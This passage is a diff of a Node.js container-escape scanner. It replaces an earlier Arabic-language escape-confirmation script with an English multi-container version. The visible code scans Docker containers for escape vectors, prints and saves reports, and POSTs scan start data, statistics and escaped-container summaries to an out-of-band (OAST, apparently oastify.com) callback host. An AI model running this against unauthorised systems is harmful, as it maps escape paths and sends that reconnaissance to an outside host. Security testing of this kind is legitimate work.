+        `Critical vulnerabilities found in ${summary.criticalIssues.length} containers`
+      );
+    }
+    
+    if (summary.vulnerableContainers.length > 0) {
+      summary.recommendations.push(
+        `Update kernel/software in ${summary.vulnerableContainers.length} containers`
+      );
+    }
+    
+    if (summary.escapedContainers.length === 0) {
+      summary.recommendations.push('No critical escape vectors detected. Regular security maintenance recommended.');
+    }
+    
+    return summary;
+  }
+
+  printSummary(summary) {
+    console.log('\n📈 SCAN STATISTICS:');
+    console.log('   Total containers scanned:', summary.totalScanned);
+    console.log('   Containers that can escape:', summary.escapedContainers.length);
+    console.log('   Vulnerable containers:', summary.vulnerableContainers.length);
+    console.log('   Critical issues:', summary.criticalIssues.length);
+    
+    if (summary.escapedContainers.length > 0) {
+      console.log('\n🚨 CRITICAL - CONTAINERS THAT CAN ESCAPE:');
+      summary.escapedContainers.forEach((container, i) => {
+        console.log(`   ${i + 1}. ${container.name || container.id}`);
+        console.log(`      Confidence: ${container.confidence}% | Risk: ${container.risk.toUpperCase()}`);
+        console.log(`      Methods: ${container.methods.join(', ')}`);
+      });
+    }
+    
+    if (summary.criticalIssues.length > 0) {
+      console.log('\n⚠️  CRITICAL VULNERABILITIES:');
+      summary.criticalIssues.forEach((issue, i) => {
+        console.log(`   ${i + 1}. ${issue.name || issue.id}`);
+        issue.evidence.forEach(ev => console.log(`      - ${ev}`));
+      });
+    }
+    
+    console.log('\n💡 RECOMMENDATIONS:');
+    summary.recommendations.forEach((rec, i) => {
+      console.log(`   ${i + 1}. ${rec}`);
     });
     
-    if (escapeConfirmation.hostSystem.hostname) {
-      console.log(`\n🖥️  اسم المضيف: ${escapeConfirmation.hostSystem.hostname}`);
+    console.log('\n📡 OAST REPORTING:');
+    console.log(`   Domain: ${CONFIG.OAST.domain}`);
+    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`   Interactions sent: ${STATE.oastInteractions.length}`);
+    console.log(`   Check OAST for detailed evidence: https://oastify.com`);
+    
+    console.log('\n' + '═'.repeat(80));
+    console.log('🎯 SCAN COMPLETE');
+    
+    if (summary.escapedContainers.length > 0) {
+      console.log('🚨 SECURITY ALERT: Container escape vectors detected!');
+      console.log('🔒 Immediate remediation required.');
+    } else {
+      console.log('✅ No critical escape vectors detected.');
+      console.log('🛡️  Regular security monitoring recommended.');
     }
     
-    if (escapeConfirmation.hostSystem.kernel) {
-      console.log(`🐧 Kernel المضيف: ${escapeConfirmation.hostSystem.kernel}`);
+    console.log('═'.repeat(80));
+  }
+
+  async saveReport(report) {
+    const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
+    const filename = `multi-container-scan-${timestamp}.json`;
+    
+    try {
+      fs.writeFileSync(filename, JSON.stringify(report, null, 2));
+      console.log(`\n💾 Full report saved to: ${filename}`);
+      
+      // Also save a summary file
+      const summaryFilename = `scan-summary-${timestamp}.txt`;
+      let summaryText = `MULTI-CONTAINER ESCAPE SCAN SUMMARY\n`;
+      summaryText += `Date: ${new Date().toLocaleString()}\n`;
+      summaryText += `Session ID: ${CONFIG.OAST.sessionId}\n\n`;
+      
+      summaryText += `STATISTICS:\n`;
+      summaryText += `  Total containers: ${report.statistics.totalContainers}\n`;
+      summaryText += `  Escaped containers: ${report.summary.escapedContainers.length}\n`;
+      summaryText += `  Critical issues: ${report.summary.criticalIssues.length}\n\n`;
+      
+      if (report.summary.escapedContainers.length > 0) {
+        summaryText += `CRITICAL CONTAINERS:\n`;
+        report.summary.escapedContainers.forEach(container => {
+          summaryText += `  - ${container.name || container.id} (${container.confidence}%)\n`;
+        });
+        summaryText += '\n';
+      }
+      
+      summaryText += `OAST DETAILS:\n`;
+      summaryText += `  Domain: ${CONFIG.OAST.domain}\n`;
+      summaryText += `  Session: ${CONFIG.OAST.sessionId}\n`;
+      summaryText += `  Interactions: ${STATE.oastInteractions.length}\n`;
+      
+      fs.writeFileSync(summaryFilename, summaryText);
+      console.log(`📝 Summary saved to: ${summaryFilename}`);
+      
+    } catch (error) {
+      console.error('❌ Failed to save report:', error.message);
     }
   }
+
+  exec(command) {
+    return new Promise((resolve, reject) => {
+      exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+        } else {
+          resolve(stdout.toString().trim());
+        }
+      });
+    });
+  }
+}
+
+// ===================== MAIN EXECUTION =====================
+async function main() {
+  console.log('🚀 Starting Multi-Container Escape Scanner...\n');
+  console.log('⚙️  Configuration:');
+  console.log(`   OAST Domain: ${CONFIG.OAST.domain}`);
+  console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+  console.log(`   Parallel scans: ${CONFIG.SCAN.parallelScans}`);
+  console.log(`   Deep scan: ${CONFIG.SCAN.deepScan ? 'Yes' : 'No'}`);
   
-  // حفظ النتائج في ملف
-  const reportFile = `/tmp/container-escape-confirmation-${Date.now()}.json`;
-  fs.writeFileSync(reportFile, JSON.stringify(escapeConfirmation, null, 2));
-  console.log(`\n💾 تم حفظ التقرير الكامل في: ${reportFile}`);
+  // Initial OAST ping
+  console.log('\n📡 Sending initial OAST ping...');
+  try {
+    const req = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/scan-start',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId
+      }
+    });
+    
+    req.write(JSON.stringify({
+      action: 'scan_start',
+      timestamp: new Date().toISOString(),
+      config: {
+        parallelScans: CONFIG.SCAN.parallelScans,
+        maxContainers: CONFIG.SCAN.maxContainers
+      }
+    }));
+    req.end();
+  } catch (e) {}
   
-  // رسالة نهائية
-  console.log("\n" + "=".repeat(70));
-  if (escapeConfirmation.verificationResults.escapedToHost) {
-    console.log("🚨 تحذير: تم تأكيد هروب الحاوية بنجاح!");
-    console.log("🔓 النظام الحالي يمكنه الوصول للنظام المضيف");
-    console.log("🛡️  يجب اتخاذ إجراءات أمنية فورية");
-  } else if (escapeConfirmation.currentSystem.isContainer === true) {
-    console.log("✅ الحاوية معزولة بشكل مناسب");
-    console.log("🔒 لم يتم اكتشاف هروب ناجح");
-  } else if (escapeConfirmation.currentSystem.isContainer === false) {
-    console.log("ℹ️  النظام الحالي ليس حاوية");
-    console.log("📋 تم إجراء فحوصات أمنية عامة فقط");
-  }
-  console.log("=".repeat(70));
+  // Create scanner and run
+  const scanner = new MultiContainerScanner();
   
-  // عرض مختصر للأدلة إذا كان هناك هروب
-  if (escapeConfirmation.verificationResults.escapedToHost) {
-    console.log("\n📋 ملخص الأدلة القاطعة:");
-    console.log("1. hostname مختلف بين الحاوية والمضيف");
-    console.log("2. الوصول لملفات نظام المضيف");
-    console.log(`3. ${escapeConfirmation.escapeEvidence.successfulMethods.length} طريقة هروب ناجحة`);
-    if (escapeConfirmation.hostSystem.users.length > 0) {
-      console.log("4. يمكن قراءة مستخدمي المضيف");
+  try {
+    // Discover containers
+    const containerIds = await scanner.discoverContainers();
+    
+    if (containerIds.length === 0) {
+      console.log('No containers to scan. Exiting.');
+      process.exit(0);
     }
+    
+    // Scan containers
+    const results = await scanner.scanContainers(containerIds);
+    
+    // Generate report
+    const report = await scanner.generateReport();
+    
+    // Send final report to OAST
+    console.log('\n📡 Sending final report to OAST...');
+    try {
+      const finalReq = https.request({
+        hostname: CONFIG.OAST.domain,
+        port: CONFIG.OAST.httpsPort,
+        path: '/scan-complete',
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'X-Session-ID': CONFIG.OAST.sessionId,
+          'X-Final-Report': 'true'
+        }
+      });
+      
+      finalReq.write(JSON.stringify({
+        action: 'scan_complete',
+        timestamp: new Date().toISOString(),
+        statistics: report.statistics,
+        summary: report.summary,
+        sessionId: CONFIG.OAST.sessionId
+      }));
+      
+      finalReq.end();
+      console.log('✅ Final report sent to OAST.');
+    } catch (e) {
+      console.log('⚠️  Could not send final report to OAST (may be expected)');
+    }
+    
+    // Exit with appropriate code
+    if (report.summary.escapedContainers.length > 0) {
+      console.log('\n⚠️  Exiting with warning code (containers can escape)');
+      process.exit(2);
+    } else {
+      console.log('\n✅ Scan completed successfully.');
+      process.exit(0);
+    }
+    
+  } catch (error) {
+    console.error('\n❌ Scan failed:', error.message);
+    process.exit(1);
   }
 }
 
-// ===================== بدء التشغيل =====================
-console.log("بدء عملية تأكيد هروب الحاوية...\n");
-performBasicChecks();
+// ===================== EXECUTE =====================
+if (require.main === module) {
+  // Check if Docker is available
+  exec('which docker', (error) => {
+    if (error) {
+      console.error('❌ Docker is not available or not in PATH.');
+      console.error('   This tool requires Docker to be installed and accessible.');
+      process.exit(1);
+    }
+    
+    // Check if we have permission to run docker commands
+    exec('docker ps', (error) => {
+      if (error && error.message.includes('permission denied')) {
+        console.error('❌ Permission denied for Docker commands.');
+        console.error('   Try running with sudo or add your user to docker group.');
+        process.exit(1);
+      }
+      
+      // Start the scan
+      main();
+    });
+  });
+}
+
+module.exports = { MultiContainerScanner, ContainerScanner };